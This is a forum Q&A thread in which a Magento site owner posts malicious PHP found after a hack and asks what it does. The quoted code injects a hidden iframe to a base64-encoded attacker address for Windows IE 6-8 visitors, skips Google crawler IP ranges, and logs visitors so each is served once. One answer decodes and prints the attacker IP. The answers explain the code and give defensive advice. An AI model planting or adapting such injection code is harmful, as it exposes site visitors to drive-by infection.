PHP Web Application (Magento) hacked; What does th

Published 2019-05-29 05:10

Question:

I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what is the purpose of this code?

Also, how to stop this and how to spot the vulnerability?

Thank you

function net_match($network, $ip) {
    // CIDR match: does $ip fall inside $network given as "a.b.c.d/bits"?
    $ip_arr       = explode('/', $network);
    $network_long = ip2long($ip_arr[0]);
    $x            = ip2long($ip_arr[1]);
    $mask         = long2ip($x) == $ip_arr[1] ? $x : 0xffffffff << (32 - $ip_arr[1]);
    $ip_long      = ip2long($ip);
    return ($ip_long & $mask) == ($network_long & $mask);
}

$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent = $_SERVER["HTTP_USER_AGENT"];

// One marker file per visitor address, so each IP receives the iframe only once.
$IP = $_SERVER['REMOTE_ADDR'] . ".log";
@mkdir('/tmp/Location/');

// Target URL kept as base64 so it does not show up in a plain grep for "http".
$dfjgkbl = base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if (!file_exists("/tmp/Location/{$IP}")) {
    // Visitors from these netblocks (several are Google's crawler ranges) get a clean page.
    if (
        net_match('64.233.160.0/19', $ip) == 0 &&
        net_match('66.102.0.0/20', $ip) == 0 &&
        net_match('66.249.64.0/19', $ip) == 0 &&
        net_match('72.14.192.0/18', $ip) == 0 &&
        net_match('74.125.0.0/16', $ip) == 0 &&
        net_match('89.207.224.0/24', $ip) == 0 &&
        net_match('193.142.125.0/24', $ip) == 0 &&
        net_match('194.110.194.0/24', $ip) == 0 &&
        net_match('209.85.128.0/17', $ip) == 0 &&
        net_match('216.239.32.0/19', $ip) == 0 &&
        net_match('128.111.0.0/16', $ip) == 0 &&
        net_match('67.217.0.0/16', $ip) == 0 &&
        net_match('188.93.0.0/16', $ip) == 0
    ) {
        // Only Windows visitors running Internet Explorer 6, 7 or 8 are served the hidden iframe.
        if (strpos($user_agent, "Windows") !== false) {
            if (preg_match("/MSIE 6.0/", $user_agent) OR
                preg_match("/MSIE 7.0/", $user_agent) OR
                preg_match("/MSIE 8.0/", $user_agent)
            ) {
                echo '<iframe frameborder=0 src="' . $dfjgkbl . '" width=1 height=1 scrolling=no></iframe>';
                touch("/tmp/Location/{$IP}");
            }
        }
    }
}

Answer 1:

It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.



Answer 2:

Just some friendly advice: if you are using FileZilla as your FTP client, it keeps the saved passwords in an XML file, and there might be a virus on your PC that uses FileZilla to connect to your server and write this to your files. Also check your cPanel and look for FTP accounts that were not created by you. This might not be the case, but check just in case.



Answer 3:

I also had a similar problem with Total Commander... The virus used the TC FTP account, completely changed my website (Joomla CMS) and added similar malicious code to almost every PHP file.



Answer 4:

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

goes to:

DO NOT CLICK THAT (this is the HACKER LINK) >>>> 129.121.38.102 / Home/ index . php

The hacker creates a log of everything that goes on your website.



Answer 5:

First, upgrade your Magento; it is a very old version at this point.

Your hacked code is a generic PHP virus code we see every time; it is an automated virus that goes from your PC to the server or from server to server.

Also, you can use a free plugin like magefirewall to protect your Magento.

P.S. I'm one of the developers.